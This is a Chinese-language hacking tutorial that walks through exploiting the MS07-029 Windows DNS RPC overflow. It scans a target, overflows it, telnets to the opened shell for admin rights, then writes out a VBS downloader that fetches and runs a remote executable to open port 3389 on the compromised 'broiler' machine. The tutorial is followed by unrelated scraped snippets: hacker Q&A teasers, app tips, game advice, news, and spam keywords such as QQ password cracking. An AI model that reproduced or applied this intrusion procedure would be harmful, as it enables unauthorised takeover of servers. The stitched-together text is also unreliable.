前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >>tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe
本文导读目录: 1、轰动的网络的黑客案有哪些? 2、为什么高级黑客攻入银行系统,却只黑了一分钱? 3、通常说的“网络黑客”具体是什么概念? 4、家中上网的电脑被黑客入侵,里面的数码照片被修...
位置分享后如何知道另一方部位(微信共享部位如何看)说到手机微信,大家都十分的了解,上边有很多十分好用的作用,今日详细介绍这一也是这诸多基本功能的一个,十分的好用,但是却非常少有些人了解。打开这一作用后...
本文目录一览: 1、黑客是不是网络安全 2、那部讲的是没有任何系统是安全的,有个组织叫max的黑客题材的电影叫什么,外国片 3、什么是黑客?黑客的危害性有哪些? 黑客是不是网络安全 是,但它...
禁闭求生昆虫拆家怎么办?在禁闭求生游戏中,我们开局之初就要为自己建造一个安身之所,但很多玩家都不知道应该把家建在哪里,因为游戏中的昆虫都是带哈士奇属性的,那么我们把房子建在什么地方才能避免被昆虫拆掉呢...
北京时间10月22日早间消息,51信用卡创始人孙海涛清晨在微博发声并致歉,他表示,这个风波是因为我们管理上的不完善,尤其是对合作公司的培训和监督不够,导致在对借款人联络沟通过程中出现了一些过激的行为,...
美国医疗找黑客攻击相关问题 qq空间黑客神器相关问题 黑客形容什么 秒破qq密码安卓(如何破安卓密码) 怎么看黑...